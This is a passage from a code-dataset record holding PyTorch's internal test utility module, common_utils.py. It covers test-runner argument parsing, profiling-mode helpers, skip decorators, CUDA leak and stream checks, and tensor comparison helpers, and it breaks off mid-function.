hexsha stringlengths 40 40 | size int64 2 1.02M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 245 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 245 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 245 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 2 1.02M | avg_line_length float64 1 417k | max_line_length int64 1 987k | alphanum_fraction float64 0 1 | content_no_comment stringlengths 0 1.01M | is_comment_constant_removed bool 1
class | is_sharp_comment_removed bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f70ff6e04f63c81719810ece2a44b944ddc360a2 | 68,978 | py | Python | torch/testing/_internal/common_utils.py | wenhaopeter/read_pytorch_code | 491f989cd918cf08874dd4f671fb7f0142a0bc4f | [
"Intel",
"X11"
] | null | null | null | torch/testing/_internal/common_utils.py | wenhaopeter/read_pytorch_code | 491f989cd918cf08874dd4f671fb7f0142a0bc4f | [
"Intel",
"X11"
] | null | null | null | torch/testing/_internal/common_utils.py | wenhaopeter/read_pytorch_code | 491f989cd918cf08874dd4f671fb7f0142a0bc4f | [
"Intel",
"X11"
] | null | null | null | r"""Importing this file must **not** initialize CUDA context. test_distributed
relies on this assumption to properly run. This means that when this is imported
no CUDA calls shall be made, including torch.cuda.device_count(), etc.
torch.testing._internal.common_cuda.py can freely initialize CUDA context when imported.
"""
import sys
import os
import platform
import re
import gc
import types
from functools import partial
import inspect
import io
import argparse
import unittest
import warnings
import random
import contextlib
import socket
import subprocess
import time
from collections import OrderedDict
from contextlib import contextmanager
from functools import wraps
from itertools import product
from copy import deepcopy
from numbers import Number
import tempfile
import json
from urllib.request import urlopen
import __main__
import errno
from typing import cast, Any, Iterable, Optional
from torch.testing._internal import expecttest
from torch.testing import _compare_tensors_internal, _compare_scalars_internal, _compare_return_type
import torch
import torch.cuda
from torch._utils_internal import get_writable_path
from torch._six import string_classes
import torch.backends.cudnn
import torch.backends.mkl
from enum import Enum
from torch.autograd import gradcheck
from torch.autograd.gradcheck import gradgradcheck
torch.backends.disable_global_flags()
IS_SANDCASTLE = os.getenv('SANDCASTLE') == '1' or os.getenv('TW_JOB_USER') == 'sandcastle'
class ProfilingMode(Enum):
LEGACY = 1
SIMPLE = 2
PROFILING = 3
def cppProfilingFlagsToProfilingMode():
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._jit_set_profiling_mode(old_prof_mode_state)
if old_prof_exec_state:
if old_prof_mode_state:
return ProfilingMode.PROFILING
else:
return ProfilingMode.SIMPLE
else:
return ProfilingMode.LEGACY
@contextmanager
def enable_profiling_mode_for_profiling_tests():
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
try:
yield
finally:
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._jit_set_profiling_mode(old_prof_mode_state)
@contextmanager
def enable_profiling_mode():
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
try:
yield
finally:
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._jit_set_profiling_mode(old_prof_mode_state)
@contextmanager
def num_profiled_runs(num_runs):
old_num_runs = torch._C._jit_set_num_profiled_runs(num_runs)
try:
yield
finally:
torch._C._jit_set_num_profiled_runs(old_num_runs)
func_call = torch._C.ScriptFunction.__call__
meth_call = torch._C.ScriptMethod.__call__
def prof_callable(callable, *args, **kwargs):
if 'profile_and_replay' in kwargs:
del kwargs['profile_and_replay']
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
with enable_profiling_mode_for_profiling_tests():
callable(*args, **kwargs)
return callable(*args, **kwargs)
return callable(*args, **kwargs)
def prof_func_call(*args, **kwargs):
return prof_callable(func_call, *args, **kwargs)
def prof_meth_call(*args, **kwargs):
return prof_callable(meth_call, *args, **kwargs)
torch._C.ScriptFunction.__call__ = prof_func_call
torch._C.ScriptMethod.__call__ = prof_meth_call
def _get_test_report_path():
# allow users to override the test file location. We need this
# because the distributed tests run the same test file multiple
# times with different configurations.
override = os.environ.get('TEST_REPORT_SOURCE_OVERRIDE')
test_source = override if override is not None else 'python-unittest'
return os.path.join('test-reports', test_source)
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument('--subprocess', action='store_true',
help='whether to run each test in a subprocess')
parser.add_argument('--seed', type=int, default=1234)
parser.add_argument('--accept', action='store_true')
parser.add_argument('--ge_config', type=str)
parser.add_argument('--repeat', type=int, default=1)
parser.add_argument('--test_bailouts', action='store_true')
parser.add_argument('--save-xml', nargs='?', type=str,
const=_get_test_report_path(),
default=_get_test_report_path() if bool(os.environ.get('IN_CIRCLECI')) else None)
parser.add_argument('--discover-tests', action='store_true')
parser.add_argument('--log-suffix', type=str, default="")
parser.add_argument('--run-parallel', type=int, default=1)
args, remaining = parser.parse_known_args()
if args.ge_config == 'legacy':
GRAPH_EXECUTOR = ProfilingMode.LEGACY
elif args.ge_config == 'profiling':
GRAPH_EXECUTOR = ProfilingMode.PROFILING
elif args.ge_config == 'simple':
GRAPH_EXECUTOR = ProfilingMode.SIMPLE
else:
# infer flags based on the default settings
GRAPH_EXECUTOR = cppProfilingFlagsToProfilingMode()
LOG_SUFFIX = args.log_suffix
RUN_PARALLEL = args.run_parallel
TEST_BAILOUTS = args.test_bailouts
TEST_DISCOVER = args.discover_tests
TEST_IN_SUBPROCESS = args.subprocess
TEST_SAVE_XML = args.save_xml
REPEAT_COUNT = args.repeat
SEED = args.seed
if not expecttest.ACCEPT:
expecttest.ACCEPT = args.accept
UNITTEST_ARGS = [sys.argv[0]] + remaining
torch.manual_seed(SEED)
def wait_for_process(p):
try:
return p.wait()
except KeyboardInterrupt:
# Give `p` a chance to handle KeyboardInterrupt. Without this,
# `pytest` can't print errors it collected so far upon KeyboardInterrupt.
exit_status = p.wait(timeout=5)
if exit_status is not None:
return exit_status
else:
p.kill()
raise
except: # noqa E722, copied from python core library
p.kill()
raise
finally:
# Always call p.wait() to ensure exit
p.wait()
def shell(command, cwd=None, env=None):
sys.stdout.flush()
sys.stderr.flush()
# The following cool snippet is copied from Py3 core library subprocess.call
# only the with
# 1. `except KeyboardInterrupt` block added for SIGINT handling.
# 2. In Py2, subprocess.Popen doesn't return a context manager, so we do
# `p.wait()` in a `final` block for the code to be portable.
#
# https://github.com/python/cpython/blob/71b6c1af727fbe13525fb734568057d78cea33f3/Lib/subprocess.py#L309-L323
assert not isinstance(command, torch._six.string_classes), "Command to shell should be a list or tuple of tokens"
p = subprocess.Popen(command, universal_newlines=True, cwd=cwd, env=env)
return wait_for_process(p)
# Used to run the same test with different tensor types
def repeat_test_for_types(dtypes):
def repeat_helper(f):
@wraps(f)
def call_helper(self, *args):
for dtype in dtypes:
with TestCase.subTest(self, dtype=dtype):
f(self, *args, dtype=dtype)
return call_helper
return repeat_helper
# Environment variable `IS_PYTORCH_CI` is set in `.jenkins/common.sh`.
IS_PYTORCH_CI = bool(os.environ.get('IS_PYTORCH_CI'))
def discover_test_cases_recursively(suite_or_case):
if isinstance(suite_or_case, unittest.TestCase):
return [suite_or_case]
rc = []
for element in suite_or_case:
rc.extend(discover_test_cases_recursively(element))
return rc
def get_test_names(test_cases):
return ['.'.join(case.id().split('.')[-2:]) for case in test_cases]
def chunk_list(lst, nchunks):
return [lst[i::nchunks] for i in range(nchunks)]
def run_tests(argv=UNITTEST_ARGS):
if TEST_DISCOVER:
suite = unittest.TestLoader().loadTestsFromModule(__main__)
test_cases = discover_test_cases_recursively(suite)
for name in get_test_names(test_cases):
print(name)
elif TEST_IN_SUBPROCESS:
suite = unittest.TestLoader().loadTestsFromModule(__main__)
test_cases = discover_test_cases_recursively(suite)
failed_tests = []
for case in test_cases:
test_case_full_name = case.id().split('.', 1)[1]
exitcode = shell([sys.executable] + argv + [test_case_full_name])
if exitcode != 0:
failed_tests.append(test_case_full_name)
assert len(failed_tests) == 0, "{} unit test(s) failed:\n\t{}".format(
len(failed_tests), '\n\t'.join(failed_tests))
elif RUN_PARALLEL > 1:
suite = unittest.TestLoader().loadTestsFromModule(__main__)
test_cases = discover_test_cases_recursively(suite)
test_batches = chunk_list(get_test_names(test_cases), RUN_PARALLEL)
processes = []
for i in range(RUN_PARALLEL):
command = [sys.executable] + argv + ['--log-suffix=-shard-{}'.format(i + 1)] + test_batches[i]
processes.append(subprocess.Popen(command, universal_newlines=True))
failed = False
for p in processes:
failed |= wait_for_process(p) != 0
assert not failed, "Some test shards have failed"
elif TEST_SAVE_XML is not None:
# import here so that non-CI doesn't need xmlrunner installed
import xmlrunner
test_report_path = TEST_SAVE_XML + LOG_SUFFIX
os.makedirs(test_report_path, exist_ok=True)
verbose = '--verbose' in argv or '-v' in argv
if verbose:
print('Test results will be stored in {}'.format(test_report_path))
unittest.main(argv=argv, testRunner=xmlrunner.XMLTestRunner(output=test_report_path, verbosity=2 if verbose else 1))
elif REPEAT_COUNT > 1:
for _ in range(REPEAT_COUNT):
if not unittest.main(exit=False, argv=argv).result.wasSuccessful():
sys.exit(-1)
else:
unittest.main(argv=argv)
IS_WINDOWS = sys.platform == "win32"
IS_MACOS = sys.platform == "darwin"
IS_PPC = platform.machine() == "ppc64le"
if IS_WINDOWS:
@contextmanager
def TemporaryFileName():
# Ideally we would like to not have to manually delete the file, but NamedTemporaryFile
# opens the file, and it cannot be opened multiple times in Windows. To support Windows,
# close the file after creation and try to remove it manually
f = tempfile.NamedTemporaryFile(delete=False)
try:
f.close()
yield f.name
finally:
os.unlink(f.name)
else:
@contextmanager # noqa: T484
def TemporaryFileName():
with tempfile.NamedTemporaryFile() as f:
yield f.name
def _check_module_exists(name):
r"""Returns if a top-level module with :attr:`name` exists *without**
importing it. This is generally safer than try-catch block around a
`import X`. It avoids third party libraries breaking assumptions of some of
our tests, e.g., setting multiprocessing start method when imported
(see librosa/#747, torchvision/#544).
"""
import importlib
import importlib.util
spec = importlib.util.find_spec(name)
return spec is not None
TEST_NUMPY = _check_module_exists('numpy')
TEST_SCIPY = _check_module_exists('scipy')
TEST_MKL = torch.backends.mkl.is_available()
TEST_NUMBA = _check_module_exists('numba')
TEST_DILL = _check_module_exists('dill')
TEST_LIBROSA = _check_module_exists('librosa')
# Python 2.7 doesn't have spawn
NO_MULTIPROCESSING_SPAWN = os.environ.get('NO_MULTIPROCESSING_SPAWN', '0') == '1'
TEST_WITH_ASAN = os.getenv('PYTORCH_TEST_WITH_ASAN', '0') == '1'
TEST_WITH_TSAN = os.getenv('PYTORCH_TEST_WITH_TSAN', '0') == '1'
TEST_WITH_UBSAN = os.getenv('PYTORCH_TEST_WITH_UBSAN', '0') == '1'
TEST_WITH_ROCM = os.getenv('PYTORCH_TEST_WITH_ROCM', '0') == '1'
# Enables tests that are slow to run (disabled by default)
TEST_WITH_SLOW = os.getenv('PYTORCH_TEST_WITH_SLOW', '0') == '1'
# Disables non-slow tests (these tests enabled by default)
# This is usually used in conjunction with TEST_WITH_SLOW to
# run *only* slow tests. (I could have done an enum, but
# it felt a little awkward.
TEST_SKIP_FAST = os.getenv('PYTORCH_TEST_SKIP_FAST', '0') == '1'
if TEST_NUMPY:
import numpy as np
# Dict of NumPy dtype -> torch dtype (when the correspondence exists)
numpy_to_torch_dtype_dict = {
np.bool : torch.bool,
np.uint8 : torch.uint8,
np.int8 : torch.int8,
np.int16 : torch.int16,
np.int32 : torch.int32,
np.int64 : torch.int64,
np.float16 : torch.float16,
np.float32 : torch.float32,
np.float64 : torch.float64,
np.complex64 : torch.complex64,
np.complex128 : torch.complex128
}
# Dict of torch dtype -> NumPy dtype
torch_to_numpy_dtype_dict = {value : key for (key, value) in numpy_to_torch_dtype_dict.items()}
ALL_TENSORTYPES = [torch.float,
torch.double,
torch.half]
# bfloat16 bringup is currently only available on ROCm
# ALL_TENSORTYPES2 will eventually be unified with ALL_TENSORTYPES
# when bfloat16 bringup is complete on all platforms
if TEST_WITH_ROCM:
ALL_TENSORTYPES2 = [torch.float,
torch.double,
torch.half,
torch.bfloat16]
else:
ALL_TENSORTYPES2 = ALL_TENSORTYPES
def skipIfRocm(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if TEST_WITH_ROCM:
raise unittest.SkipTest("test doesn't currently work on the ROCm stack")
else:
fn(*args, **kwargs)
return wrapper
def skipIfCompiledWithoutNumpy(fn):
# Even if the numpy module is present, if `USE_NUMPY=0` is used during the
# build, numpy tests will fail
numpy_support = TEST_NUMPY
if numpy_support:
try:
# The numpy module is present, verify that PyTorch is compiled with
# numpy support
torch.from_numpy(np.array([2, 2]))
except RuntimeError:
numpy_support = False
@wraps(fn)
def wrapper(*args, **kwargs):
if not numpy_support:
raise unittest.SkipTest("PyTorch was compiled without numpy support")
else:
fn(*args, **kwargs)
return wrapper
def _test_function(fn, device):
def run_test_function(self):
return fn(self, device)
return run_test_function
def skipIfNoLapack(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not torch._C.has_lapack:
raise unittest.SkipTest('PyTorch compiled without Lapack')
else:
fn(*args, **kwargs)
return wrapper
def skipIfNotRegistered(op_name, message):
"""Wraps the decorator to hide the import of the `core`.
Args:
op_name: Check if this op is registered in `core._REGISTERED_OPERATORS`.
message: message to fail with.
Usage:
@skipIfNotRegistered('MyOp', 'MyOp is not linked!')
This will check if 'MyOp' is in the caffe2.python.core
"""
try:
from caffe2.python import core
skipper = unittest.skipIf(op_name not in core._REGISTERED_OPERATORS,
message)
except ImportError:
skipper = unittest.skip("Cannot import `caffe2.python.core`")
return skipper
def skipIfNoSciPy(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_SCIPY:
raise unittest.SkipTest("test require SciPy, but SciPy not found")
else:
fn(*args, **kwargs)
return wrapper
def slowTest(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_WITH_SLOW:
raise unittest.SkipTest("test is slow; run with PYTORCH_TEST_WITH_SLOW to enable test")
else:
fn(*args, **kwargs)
wrapper.__dict__['slow_test'] = True
return wrapper
def skipCUDAMemoryLeakCheckIf(condition):
def dec(fn):
if getattr(fn, '_do_cuda_memory_leak_check', True): # if current True
fn._do_cuda_memory_leak_check = not condition
return fn
return dec
def skipCUDANonDefaultStreamIf(condition):
def dec(fn):
if getattr(fn, '_do_cuda_non_default_stream', True): # if current True
fn._do_cuda_non_default_stream = not condition
return fn
return dec
def suppress_warnings(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
fn(*args, **kwargs)
return wrapper
def get_cpu_type(type_name):
module, name = type_name.rsplit('.', 1)
assert module == 'torch.cuda'
return getattr(torch, name)
def get_gpu_type(type_name):
if isinstance(type_name, type):
type_name = '{}.{}'.format(type_name.__module__, type_name.__name__)
module, name = type_name.rsplit('.', 1)
assert module == 'torch'
return getattr(torch.cuda, name)
def to_gpu(obj, type_map=None):
if type_map is None:
type_map = {}
if isinstance(obj, torch.Tensor):
assert obj.is_leaf
t = type_map.get(obj.type(), get_gpu_type(obj.type()))
with torch.no_grad():
res = obj.clone().type(t)
res.requires_grad = obj.requires_grad
return res
elif torch.is_storage(obj):
return obj.new().resize_(obj.size()).copy_(obj)
elif isinstance(obj, list):
return [to_gpu(o, type_map) for o in obj]
elif isinstance(obj, tuple):
return tuple(to_gpu(o, type_map) for o in obj)
else:
return deepcopy(obj)
def get_function_arglist(func):
return inspect.getfullargspec(func).args
def set_rng_seed(seed):
torch.manual_seed(seed)
random.seed(seed)
if TEST_NUMPY:
np.random.seed(seed)
@contextlib.contextmanager
def freeze_rng_state():
rng_state = torch.get_rng_state()
if torch.cuda.is_available():
cuda_rng_state = torch.cuda.get_rng_state()
yield
if torch.cuda.is_available():
torch.cuda.set_rng_state(cuda_rng_state)
torch.set_rng_state(rng_state)
@contextlib.contextmanager
def set_default_dtype(dtype):
saved_dtype = torch.get_default_dtype()
torch.set_default_dtype(dtype)
yield
torch.set_default_dtype(saved_dtype)
def iter_indices(tensor):
if tensor.dim() == 0:
return range(0)
if tensor.dim() == 1:
return range(tensor.size(0))
return product(*(range(s) for s in tensor.size()))
def is_iterable(obj):
try:
iter(obj)
return True
except TypeError:
return False
class CudaNonDefaultStream():
def __enter__(self):
# Before starting CUDA test save currently active streams on all
# CUDA devices and set new non default streams to all CUDA devices
# to ensure CUDA tests do not use default stream by mistake.
beforeDevice = torch.cuda.current_device()
self.beforeStreams = []
for d in range(torch.cuda.device_count()):
self.beforeStreams.append(torch.cuda.current_stream(d))
deviceStream = torch.cuda.Stream(device=d)
torch._C._cuda_setStream(deviceStream._cdata)
torch._C._cuda_setDevice(beforeDevice)
def __exit__(self, exec_type, exec_value, traceback):
# After completing CUDA test load previously active streams on all
# CUDA devices.
beforeDevice = torch.cuda.current_device()
for d in range(torch.cuda.device_count()):
torch._C._cuda_setStream(self.beforeStreams[d]._cdata)
torch._C._cuda_setDevice(beforeDevice)
class CudaMemoryLeakCheck():
def __init__(self, testcase, name=None):
self.name = testcase.id() if name is None else name
self.testcase = testcase
# initialize context & RNG to prevent false positive detections
# when the test is the first to initialize those
from torch.testing._internal.common_cuda import initialize_cuda_context_rng
initialize_cuda_context_rng()
@staticmethod
def get_cuda_memory_usage():
# we don't need CUDA synchronize because the statistics are not tracked at
# actual freeing, but at when marking the block as free.
num_devices = torch.cuda.device_count()
gc.collect()
return tuple(torch.cuda.memory_allocated(i) for i in range(num_devices))
def __enter__(self):
self.befores = self.get_cuda_memory_usage()
def __exit__(self, exec_type, exec_value, traceback):
# Don't check for leaks if an exception was thrown
if exec_type is not None:
return
afters = self.get_cuda_memory_usage()
for i, (before, after) in enumerate(zip(self.befores, afters)):
self.testcase.assertEqual(
before, after, msg='{} leaked {} bytes CUDA memory on device {}'.format(
self.name, after - before, i))
# "min_satisfying_examples" setting has been deprecated in hypythesis
# 3.56.0 and removed in hypothesis 4.x
try:
import hypothesis
def settings(*args, **kwargs):
if 'min_satisfying_examples' in kwargs and hypothesis.version.__version_info__ >= (3, 56, 0):
kwargs.pop('min_satisfying_examples')
return hypothesis.settings(*args, **kwargs)
hypothesis.settings.register_profile(
"pytorch_ci",
settings(
derandomize=True,
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=100,
verbosity=hypothesis.Verbosity.normal))
hypothesis.settings.register_profile(
"dev",
settings(
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=10,
verbosity=hypothesis.Verbosity.normal))
hypothesis.settings.register_profile(
"debug",
settings(
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=1000,
verbosity=hypothesis.Verbosity.verbose))
hypothesis.settings.load_profile(
"pytorch_ci" if IS_PYTORCH_CI else os.getenv('PYTORCH_HYPOTHESIS_PROFILE',
'dev')
)
except ImportError:
print('Fail to import hypothesis in common_utils, tests are not derandomized')
disabled_test_from_issues = None
def check_disabled(test_name):
global disabled_test_from_issues
if disabled_test_from_issues is None:
disabled_test_from_issues = {}
def read_and_process():
url = 'https://raw.githubusercontent.com/zdevito/pytorch_disabled_tests/master/result.json'
contents = urlopen(url, timeout=1).read().decode('utf-8')
the_response = json.loads(contents)
for item in the_response['items']:
title = item['title']
key = 'DISABLED '
if title.startswith(key):
test_name = title[len(key):].strip()
disabled_test_from_issues[test_name] = item['html_url']
if not IS_SANDCASTLE and os.getenv("PYTORCH_RUN_DISABLED_TESTS", "0") != "1":
try:
read_and_process()
except Exception:
print("Couldn't download test skip set, leaving all tests enabled...")
if test_name in disabled_test_from_issues:
raise unittest.SkipTest(
"Test is disabled because an issue exists disabling it: {}".format(disabled_test_from_issues[test_name]) +
" To enable set the environment variable PYTORCH_RUN_DISABLED_TESTS=1")
# Acquires the comparison dtype, required since isclose
# requires both inputs have the same dtype, and isclose is not supported
# for some device x dtype combinations.
# NOTE: Remaps bfloat16 to float32 since neither the CPU or CUDA device types
# support needed bfloat16 comparison methods.
# NOTE: Remaps float16 to float32 on CPU since the CPU device type doesn't
# support needed float16 comparison methods.
# TODO: Update this once bfloat16 and float16 are better supported.
def get_comparison_dtype(a, b):
# TODO: update this when promote_types supports bfloat16 and/or
# isclose supports bfloat16.
a_dtype = torch.float32 if a.dtype is torch.bfloat16 else a.dtype
b_dtype = torch.float32 if b.dtype is torch.bfloat16 else b.dtype
compare_dtype = torch.promote_types(a_dtype, b_dtype)
# non-CUDA (CPU, for example) float16 -> float32
# TODO: update this when isclose is implemented for CPU float16
if (compare_dtype is torch.float16 and
(a.device != b.device or a.device.type != 'cuda' or
b.device.type != 'cuda')):
compare_dtype = torch.float32
return compare_dtype
class TestCase(expecttest.TestCase):
# NOTE: "precision" lets classes and generated tests set minimum
# atol values when comparing tensors. Used by @precisionOverride, for
# example.
# TODO: provide a better mechanism for generated tests to set rtol/atol.
_precision: float = 0
@property
def precision(self) -> float:
return self._precision
@precision.setter
def precision(self, prec: float) -> None:
self._precision = prec
_do_cuda_memory_leak_check = False
_do_cuda_non_default_stream = False
def __init__(self, method_name='runTest'):
super().__init__(method_name)
test_method = getattr(self, method_name, None)
if test_method is not None:
# Wraps the tested method if we should do CUDA memory check.
self._do_cuda_memory_leak_check &= getattr(test_method, '_do_cuda_memory_leak_check', True)
# FIXME: figure out the flaky -1024 anti-leaks on windows. See #8044
if self._do_cuda_memory_leak_check and not IS_WINDOWS:
self.wrap_with_cuda_policy(method_name, self.assertLeaksNoCudaTensors)
# Wraps the tested method if we should enforce non default CUDA stream.
self._do_cuda_non_default_stream &= getattr(test_method, '_do_cuda_non_default_stream', True)
if self._do_cuda_non_default_stream and not IS_WINDOWS and not TEST_WITH_ROCM:
self.wrap_with_cuda_policy(method_name, self.enforceNonDefaultStream)
def assertLeaksNoCudaTensors(self, name=None):
name = self.id() if name is None else name
return CudaMemoryLeakCheck(self, name)
def enforceNonDefaultStream(self):
return CudaNonDefaultStream()
def wrap_with_cuda_policy(self, method_name, policy):
test_method = getattr(self, method_name)
# the import below may initialize CUDA context, so we do it only if
# self._do_cuda_memory_leak_check or self._do_cuda_non_default_stream
# is True.
from torch.testing._internal.common_cuda import TEST_CUDA
fullname = self.id().lower() # class_name.method_name
if TEST_CUDA and ('gpu' in fullname or 'cuda' in fullname):
setattr(self, method_name, self.wrap_method_with_cuda_policy(test_method, policy))
def wrap_method_with_cuda_policy(self, method, policy):
# Assumes that `method` is the tested function in `self`.
# NOTE: Python Exceptions (e.g., unittest.Skip) keeps objects in scope
# alive, so this cannot be done in setUp and tearDown because
# tearDown is run unconditionally no matter whether the test
# passes or not. For the same reason, we can't wrap the `method`
# call in try-finally and always do the check.
@wraps(method)
def wrapper(self, *args, **kwargs):
with policy():
method(*args, **kwargs)
return types.MethodType(wrapper, self)
def wrap_with_cuda_memory_check(self, method):
return self.wrap_method_with_cuda_policy(method, self.assertLeaksNoCudaTensors)
def setUp(self):
if TEST_SKIP_FAST:
if not getattr(self, self._testMethodName).__dict__.get('slow_test', False):
raise unittest.SkipTest("test is fast; we disabled it with PYTORCH_TEST_SKIP_FAST")
check_disabled(str(self))
set_rng_seed(SEED)
def genSparseTensor(self, size, sparse_dim, nnz, is_uncoalesced, device='cpu'):
# Assert not given impossible combination, where the sparse dims have
# empty numel, but nnz > 0 makes the indices containing values.
assert all(size[d] > 0 for d in range(sparse_dim)) or nnz == 0, 'invalid arguments'
v_size = [nnz] + list(size[sparse_dim:])
v = torch.randn(*v_size, device=device)
i = torch.rand(sparse_dim, nnz, device=device)
i.mul_(torch.tensor(size[:sparse_dim]).unsqueeze(1).to(i))
i = i.to(torch.long)
if is_uncoalesced:
v = torch.cat([v, torch.randn_like(v)], 0)
i = torch.cat([i, i], 1)
x = torch.sparse_coo_tensor(i, v, torch.Size(size))
if not is_uncoalesced:
x = x.coalesce()
else:
# FIXME: `x` is a sparse view of `v`. Currently rebase_history for
# sparse views is not implemented, so this workaround is
# needed for inplace operations done on `x`, e.g., copy_().
# Remove after implementing something equivalent to CopySlice
# for sparse views.
# NOTE: We do clone() after detach() here because we need to be able to change size/storage of x afterwards
x = x.detach().clone()
return x, x._indices().clone(), x._values().clone()
def safeToDense(self, t):
r = self.safeCoalesce(t)
return r.to_dense()
def safeCoalesce(self, t):
tc = t.coalesce()
self.assertEqual(tc.to_dense(), t.to_dense())
self.assertTrue(tc.is_coalesced())
# Our code below doesn't work when nnz is 0, because
# then it's a 0D tensor, not a 2D tensor.
if t._nnz() == 0:
self.assertEqual(t._indices(), tc._indices())
self.assertEqual(t._values(), tc._values())
return tc
value_map = {}
for idx, val in zip(t._indices().t(), t._values()):
idx_tup = tuple(idx.tolist())
if idx_tup in value_map:
value_map[idx_tup] += val
else:
value_map[idx_tup] = val.clone() if isinstance(val, torch.Tensor) else val
new_indices = sorted(list(value_map.keys()))
new_values = [value_map[idx] for idx in new_indices]
if t._values().ndimension() < 2:
new_values = t._values().new(new_values)
else:
new_values = torch.stack(new_values)
new_indices = t._indices().new(new_indices).t()
tg = t.new(new_indices, new_values, t.size())
self.assertEqual(tc._indices(), tg._indices())
self.assertEqual(tc._values(), tg._values())
if t.is_coalesced():
self.assertEqual(tc._indices(), t._indices())
self.assertEqual(tc._values(), t._values())
return tg
# Compares the given Torch and NumPy functions on the given tensor-like object.
# NOTE: both torch_fn and np_fn should be functions that take a single
# tensor (array). If the torch and/or NumPy function require additional
# arguments then wrap the function in a lambda or pass a partial function.
# TODO: support bfloat16 comparisons
# TODO: add args/kwargs for passing to assertEqual (e.g. rtol, atol)
def compare_with_numpy(self, torch_fn, np_fn, tensor_like, device=None, dtype=None):
assert TEST_NUMPY
assert dtype is not torch.bfloat16
if isinstance(tensor_like, torch.Tensor):
assert device is None
assert dtype is None
a = tensor_like.detach().cpu().numpy()
t = tensor_like
else:
a = np.array(tensor_like, dtype=torch_to_numpy_dtype_dict[dtype])
t = torch.tensor(tensor_like, device=device, dtype=dtype)
np_result = np_fn(a)
torch_result = torch_fn(t).cpu()
# Converts arrays to tensors
if isinstance(np_result, np.ndarray):
try:
np_result = torch.from_numpy(np_result)
except Exception:
# NOTE: copying an array before conversion is necessary when,
# for example, the array has negative strides.
np_result = torch.from_numpy(np_result.copy())
self.assertEqual(np_result, torch_result)
# Some analysis of tolerance by logging tests from test_torch.py can be found
# in https://github.com/pytorch/pytorch/pull/32538.
# dtype name : (rtol, atol)
dtype_precisions = {
torch.float16 : (0.001, 1e-5),
torch.bfloat16 : (0.016, 1e-5),
torch.float32 : (1.3e-6, 1e-5),
torch.float64 : (1e-7, 1e-7),
torch.complex32 : (0.001, 1e-5),
torch.complex64 : (1.3e-6, 1e-5),
torch.complex128 : (1e-7, 1e-7),
}
# Returns the "default" rtol and atol for comparing scalars or
# tensors of the given dtypes.
def _getDefaultRtolAndAtol(self, dtype0, dtype1):
rtol = max(self.dtype_precisions.get(dtype0, (0, 0))[0],
self.dtype_precisions.get(dtype1, (0, 0))[0])
atol = max(self.dtype_precisions.get(dtype0, (0, 0))[1],
self.dtype_precisions.get(dtype1, (0, 0))[1])
return rtol, atol
# Checks if two dense tensors are equal(-ish), returning (True, None)
# when they are and (False, debug_msg) when they are not.
# If exact_dtype is true both tensors must have the same dtype.
# If exact_device is true both tensors must be on the same device.
# See the "Test Framework Tensor 'Equality'" note for more details.
# NOTE: tensors on different devices are moved to the CPU to be compared when
# exact_device is False.
# NOTE: this function checks the tensors' devices, sizes, and dtypes
# and acquires the appropriate device, dtype, rtol and atol to compare
# them with. It then calls _compare_tensors_internal.
def _compareTensors(self, a, b, *, rtol: Optional[float] = None, atol=None, equal_nan=True,
exact_dtype=True, exact_device=False) -> _compare_return_type:
assert (atol is None) == (rtol is None)
if not isinstance(a, torch.Tensor):
return (False, "argument a, {0}, to _compareTensors is not a tensor!".format(a))
if not isinstance(b, torch.Tensor):
return (False, "argument b, {0}, to _compareTensors is not a tensor!".format(b))
# Validates tensors are on the same device
if exact_device and a.device != b.device:
return (False, ("Attempted to compare equality of tensors on "
"different devices! Got devices {0} and "
"{1}.".format(a.device, b.device)))
# Compares tensors of different devices on the CPU
if a.device != b.device:
a = a.cpu()
b = b.cpu()
# Checks size matches
if a.size() != b.size():
return (False, ("Attempted to compare equality of tensors with "
"different sizes. Got sizes {0} and {1}.").format(a.size(), b.size()))
# Checks dtype (if exact_dtype)
if exact_dtype and a.dtype is not b.dtype:
return (False, ("Attempted to compare equality of tensors with "
"different dtypes. Got dtypes {0} and {1}.").format(a.dtype, b.dtype))
# Acquires rtol and atol
if rtol is None:
rtol, atol = self._getDefaultRtolAndAtol(a.dtype, b.dtype)
atol = max(atol, self.precision)
# Converts to comparison dtype
